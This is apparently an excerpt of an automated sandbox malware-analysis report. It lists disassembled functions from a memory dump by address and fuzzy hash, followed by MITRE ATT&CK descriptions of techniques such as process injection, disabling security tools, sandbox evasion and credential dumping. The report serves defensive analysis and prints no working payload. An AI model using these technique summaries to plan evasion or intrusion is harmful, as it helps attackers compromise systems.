d, xrefs: 00007FFD9B8AF2BE
4, xrefs: 00007FFD9B8AF6A3
%, xrefs: 00007FFD9B8AFC19
{, xrefs: 00007FFD9B8ADF15

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: %$4$;$d${
API String ID: 0-318956191
Opcode ID: b8c318e69c516d949d01f0cbbb47e0cd4d38855338813681ccbf88d782ab978b
Instruction ID: f4c4dbc267a71a6b361f3de05a1ebea4ffde3a614c8af1d61821a5c69c00f21a
Opcode Fuzzy Hash: b8c318e69c516d949d01f0cbbb47e0cd4d38855338813681ccbf88d782ab978b
Instruction Fuzzy Hash: 5361B270E0966E8BEB78DF54C8A47B9B6B1BF48301F1141F9D40DA26A1CB785A94CF10

Function 00007FFD9B8A0FB0 Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD9B8A0D21
H, xrefs: 00007FFD9B8A0F1F

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: H$H
API String ID: 0-136785262
Opcode ID: ffd0106d137ef6ac02c2f21d9a1f70bc5fb96ed1814c75d617daa38cc5e3145a
Instruction ID: e5ede982602f918f27f13289e93e1886545a19d75d356c680d8c5075ddf56d58
Opcode Fuzzy Hash: ffd0106d137ef6ac02c2f21d9a1f70bc5fb96ed1814c75d617daa38cc5e3145a
Instruction Fuzzy Hash: 4781C671E1AA0D4FEB68EB58C865BEDB3A1FF58310F0042B9D01DE71E6DE346A458B50

Function 00007FFD9B8AFB4B Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

=, xrefs: 00007FFD9B8AF61F

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: 701c6c3f90ea8a529d28890436e8d10cf2842920f255896f3be2d773ef0b017c
Instruction ID: 57221e1ac0f3698bfc0df6b8f8fc9038402f8e06e8b3b4edb997364405fdbfce
Opcode Fuzzy Hash: 701c6c3f90ea8a529d28890436e8d10cf2842920f255896f3be2d773ef0b017c
Instruction Fuzzy Hash: 8911C870E0A66DCFEBA4DF44C8947B9B7B1FB58302F1042AAD00DD2691DB786A94CF50

Function 00007FFD9B8AD2F5 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7580cf81d527f31f54e338fb4ce98b774459cf9ef421edc5d587e7bcb2b10cc3
Instruction ID: 011c4c0445a9d890517b6dfcd1fe6d5ad4fd5d6db3226163351889a86dd97df7
Opcode Fuzzy Hash: 7580cf81d527f31f54e338fb4ce98b774459cf9ef421edc5d587e7bcb2b10cc3
Instruction Fuzzy Hash: 9FE16B71E1965D8FEBA8EB98D865BB8B7B1FF18300F0401BAD01DD32E6DA346941CB51

Function 00007FFD9B8A05ED Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a352d9d63492d67772e692b02da62bbe8036b1bc6b0775c523fac20b1457e8
Instruction ID: 76069700d08a13631d88851f5874cb69b83dc6f613be5bffadf5a8c84b6bc57e
Opcode Fuzzy Hash: 03a352d9d63492d67772e692b02da62bbe8036b1bc6b0775c523fac20b1457e8
Instruction Fuzzy Hash: F2915943B0F6D94BE32627AC7C390E97F90DF4666870D43F7E09C8A0E7EC1965068295

Function 00007FFD9B8A0638 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f613c9b8d940c58f02901f8cc95dd635c950292e6642c962db4815781f7af3
Instruction ID: b89a5a443c461170f0177f060c917d7542257ebf6f6d3aa8e0cebf03db3b4d1c
Opcode Fuzzy Hash: f8f613c9b8d940c58f02901f8cc95dd635c950292e6642c962db4815781f7af3
Instruction Fuzzy Hash: B9814943B0F6D94BE32567AC7C294E87FA0EF4676470943F7E09C8A0FBEC1565068295

Function 00007FFD9B8AA838 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81b827488e9d61256524a440555dd849b872b2ac0aacb2ba7e48101f45056a72
Instruction ID: 051aeed875bf99265ba43b32dc3644426aa8d65f4e42f6348de28045202eb26b
Opcode Fuzzy Hash: 81b827488e9d61256524a440555dd849b872b2ac0aacb2ba7e48101f45056a72
Instruction Fuzzy Hash: C641F761E0E54F6FE751ABB888682B97BE0FF19310F0645B6D06CC74E6EE38A6418351

Function 00007FFD9B8ABA62 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f43c743d590a1190bd7000d2e4f907425e3e2df5a5cfea40177721a42f0bfbc
Instruction ID: 39fbd2a620cbc7ff0ca000f7b94f54eb5e6d0b595fc434c8e2ec4f6b17963708
Opcode Fuzzy Hash: 2f43c743d590a1190bd7000d2e4f907425e3e2df5a5cfea40177721a42f0bfbc
Instruction Fuzzy Hash: 1131F974E1991D9FEBA4EB9888A1AFDB7B5FF5C300F511039D04DE32A2DE3469428B10

Function 00007FFD9B8ABAD0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e2ca6ca2248cb031747cdd10dfbf82fd40661358b2d5bfc0249d889e70b03b
Instruction ID: e8cda476247d2ba2555f5fc4be69a5ba4cee777355cf80dd5cf553687a48c0e6
Opcode Fuzzy Hash: 91e2ca6ca2248cb031747cdd10dfbf82fd40661358b2d5bfc0249d889e70b03b
Instruction Fuzzy Hash: 8E215E74E0D91D8FDBA4EBA888616FDB7B5FF5D300F511139D04DE32A2CE2469428B10

Function 00007FFD9B8A0805 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5189572d63fa8552cd3140e8d071d5df31d646aa9669d0c86894496a821891c5
Instruction ID: 6458be562281706bff94164f5df498648b2d84e91948e5ee2ecac0f67d354fd0
Opcode Fuzzy Hash: 5189572d63fa8552cd3140e8d071d5df31d646aa9669d0c86894496a821891c5
Instruction Fuzzy Hash: 7421AD51B1F18B8BD71527BC9C7A5E87B90FF51218B0902B7D06CCA0D7ED08A15AC295

Function 00007FFD9B8A33D1 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28948b464a642138692a4dbc67ab8279076ede9d1178acb16acebb1609a22d6d
Instruction ID: a83abd9a21b812c7a5fa894adf6232b5e6c25a3e8cb2fe359d183ae9fc4abe2b
Opcode Fuzzy Hash: 28948b464a642138692a4dbc67ab8279076ede9d1178acb16acebb1609a22d6d
Instruction Fuzzy Hash: 0E213D30A0A54E8FEB65EBA4C8696BD77A0FF18304F11057AD41DC71A1DF35A640D750

Function 00007FFD9B8A3330 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b5436d18f1a898f168112f03362292135ce8904357a567631245e2d039c094
Instruction ID: 99f6687ffe22e6ee81d4d378cceb6f4036b48106260fe50280b4d86b1831ac43
Opcode Fuzzy Hash: 43b5436d18f1a898f168112f03362292135ce8904357a567631245e2d039c094
Instruction Fuzzy Hash: 7621503094E78A9FD753ABB488685A97FF0FF4B314B0645F6D054CB0B2DA289546C721

Function 00007FFD9B8A3213 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd12151fafcd6fc35dc913ba63c20a6e798aeee8ada80dc247d114192a20253e
Instruction ID: f30e5785bf175a041909db491547cb683e98b5f2eb232707a9c38e7f9dfeffc6
Opcode Fuzzy Hash: cd12151fafcd6fc35dc913ba63c20a6e798aeee8ada80dc247d114192a20253e
Instruction Fuzzy Hash: 0E21C571E0961E8FEBA4EF98C4A4AECB7F1FF58301F154169D009E72A5DA786A41CB10

Function 00007FFD9B8A0A01 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ad4f1a791d485d4270e27bb70ff53d26aaa90d4fda1ddee57deb361da1f1bb
Instruction ID: 6f013a1c92e2e429f9ed890f36690bebf033c914152249a03ec82aa16c9361fa
Opcode Fuzzy Hash: 31ad4f1a791d485d4270e27bb70ff53d26aaa90d4fda1ddee57deb361da1f1bb
Instruction Fuzzy Hash: 8011BF30E2A94E4FEBA0EBA888695BD77E1FF58700F4146B6D41CC70A6EE34B6448710

Function 00007FFD9B8A21E5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef51436b07923723f6440c38633503eb21a8b81fc1174083cde2523f4e77aae
Instruction ID: 51bdaf3a83435f1e8b3c3f92bc58dbf7dd8c27dfa445dec7835410280d86c095
Opcode Fuzzy Hash: bef51436b07923723f6440c38633503eb21a8b81fc1174083cde2523f4e77aae
Instruction Fuzzy Hash: 7D019230A4E64E8FE761EFB488695A87BE0EF4A300F0245B6D408C74B6DE35E680C711

Function 00007FFD9B8ACF1D Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5fb03403cea15c1517bd0128167552ac6eefdb80fae6b9c587a8f337c2ee25
Instruction ID: e9dcceda92d3f947072a6bc27f817687ba18dc0252392ba1dc1fe7133582cc1d
Opcode Fuzzy Hash: 0f5fb03403cea15c1517bd0128167552ac6eefdb80fae6b9c587a8f337c2ee25
Instruction Fuzzy Hash: 10115E30A0964E8FDB59EF64C8696B97BE0FF19304F0204BAD41DC61A6DB75A650CB50

Function 00007FFD9B8AC5F3 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d3a0549e589bfceedd63776578a660af19e800b0acd56a5d41ec5959962a64
Instruction ID: b490741c381a8268797e207172200701dbb7384207b7dec2ed3d78ab7924f8e3
Opcode Fuzzy Hash: 48d3a0549e589bfceedd63776578a660af19e800b0acd56a5d41ec5959962a64
Instruction Fuzzy Hash: 73017531B0992E85E755AFF8B8296F977E0FF18315F10097BD45DC2091DE3461849A81

Function 00007FFD9B8A282D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff079d351150c9f010004ed51f590aaf3e7119c08f0a93fbe4e2ecedca6f66e
Instruction ID: 0d22346dbe54c15dc4e02549633f015a3d59e039d50a69f50c998e67fb143e5a
Opcode Fuzzy Hash: 8ff079d351150c9f010004ed51f590aaf3e7119c08f0a93fbe4e2ecedca6f66e
Instruction Fuzzy Hash: 4A018430E1A54E8FE761EFA489585A9BBE0FF1D300F0245B6E418C70A6EE38E244C750

Function 00007FFD9B8B0740 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b96674a7d5a8b31c0e9a302550ec73d46c54368c5038c6ce80fa20268cc5746
Instruction ID: 057b08e50be12982d65df3fcb60a47cad1410a4f9cd0b55e1424dd56a22455e4
Opcode Fuzzy Hash: 0b96674a7d5a8b31c0e9a302550ec73d46c54368c5038c6ce80fa20268cc5746
Instruction Fuzzy Hash: C0012130E1551E8EDB94EFA5C4686BEB7E0FF18305F51047AD41ED21A5DE35A650CB40

Function 00007FFD9B8B0721 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ebf5e53654b2ac73b22cc7d9e170b8a83bb717a86bdc9c27e5647fe12aa8d9
Instruction ID: 771d4ab54d508bd152b8843f4d1ba03bdfa681335a8806116246d68a17c488bc
Opcode Fuzzy Hash: b8ebf5e53654b2ac73b22cc7d9e170b8a83bb717a86bdc9c27e5647fe12aa8d9
Instruction Fuzzy Hash: 07F0A930E1A65E8FEB95DFA888281FD7BE0FF19700F41057AD419C21A2DB349650CF81

Function 00007FFD9B8A2EC9 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5e1cb7709f865525ff5ae335a3b5ae2069ee71e73098ff0eef5a51b9e892220
Instruction ID: 45c9e22747b00fee4c917e2f86422403f429c64ded80a42e495f745d4bddd813
Opcode Fuzzy Hash: c5e1cb7709f865525ff5ae335a3b5ae2069ee71e73098ff0eef5a51b9e892220
Instruction Fuzzy Hash: 45018430A1E64E4FE762EBB489695A97BE0EF4A300F4605F7D408CB0B6DA38A544C711

Function 00007FFD9B8AA409 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 435b66cd719cbdbd1ceeab342c41b06c43faa83d8572d474e8e6d802af68d2b7
Instruction ID: bb7fb81a435c19635d3d819ac1d0d36309a3f6c50348a1d90f06783f4daa6f53
Opcode Fuzzy Hash: 435b66cd719cbdbd1ceeab342c41b06c43faa83d8572d474e8e6d802af68d2b7
Instruction Fuzzy Hash: 05018430A4F68E5FE762EB74886D5A97BE4EF4A300F0644F7E40CC74B6DA38A5448721

Function 00007FFD9B8A0610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d7224aff3404696e5656fe670602b4999af3d62dd2e70f05713dc432ffcfd5
Instruction ID: d9ad6f30c3f7c85a272bbcdcf47b47743582a7e19d9566d611771e31a1d972c2
Opcode Fuzzy Hash: 86d7224aff3404696e5656fe670602b4999af3d62dd2e70f05713dc432ffcfd5
Instruction Fuzzy Hash: 42018130A1950E8AEB68EFA4C5696B977E0FF1C305F11087EE41EC21E5DF35B690CA11

Function 00007FFD9B8A0608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 811844258856e76a6a89d15309ad02b8daa5174e90dd9bee851737df8fc10273
Instruction ID: 38f9bfd7401a0e6fff38e60c0563ba9dadf9de59c5ed2a25f37fd3cc4accac77
Opcode Fuzzy Hash: 811844258856e76a6a89d15309ad02b8daa5174e90dd9bee851737df8fc10273
Instruction Fuzzy Hash: 79018130A1550ECBEB69EFA4C5686B973A0FF1C305F51087ED41EC21E5DE35B690CA10

Function 00007FFD9B8A1C2D Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9cf2f6b7419f3ccc90330f0729fbdade332f7fc4f7a5d5e78626e875cf113e
Instruction ID: 94f5bba013beffdc8373ddf629890fffe57969e05f26bfba8673ed66463b9c20
Opcode Fuzzy Hash: 3b9cf2f6b7419f3ccc90330f0729fbdade332f7fc4f7a5d5e78626e875cf113e
Instruction Fuzzy Hash: E8018630A0A64E8FDB55EF54C4A52B97BA1FF5A300F45107AD418C61A1DB799650C741

Function 00007FFD9B8A2749 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c6c325afa388577b2f36d98a76510014e285b7b883e7eb073951c8516a1d80a
Instruction ID: 1f152710dd3c2159c02016abe316740ab3291f3eb712b4720e1f2c2fea4f75d4
Opcode Fuzzy Hash: 4c6c325afa388577b2f36d98a76510014e285b7b883e7eb073951c8516a1d80a
Instruction Fuzzy Hash: 05F0F63090E38E8FDB2A9F6488642E93B70FF06204F4604FAD809C60E6DB38A654CB11

Function 00007FFD9B8A27BD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2005141785.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9b8a0000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdbc12564f7e7797ad32903946c91fe91f7ac9efd69a5555a17b2f6ce885aa1e
Instruction ID: f76cd14c94d743cac78c4b647b87d360933ffd2317604396df181a5c8f0e3a93
Opcode Fuzzy Hash: fdbc12564f7e7797ad32903946c91fe91f7ac9efd69a5555a17b2f6ce885aa1e
Instruction Fuzzy Hash: 80F02B3090E68DCFDB799F6488251F93BA0FF09304F0504BED409C20E6DB39A654C711

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

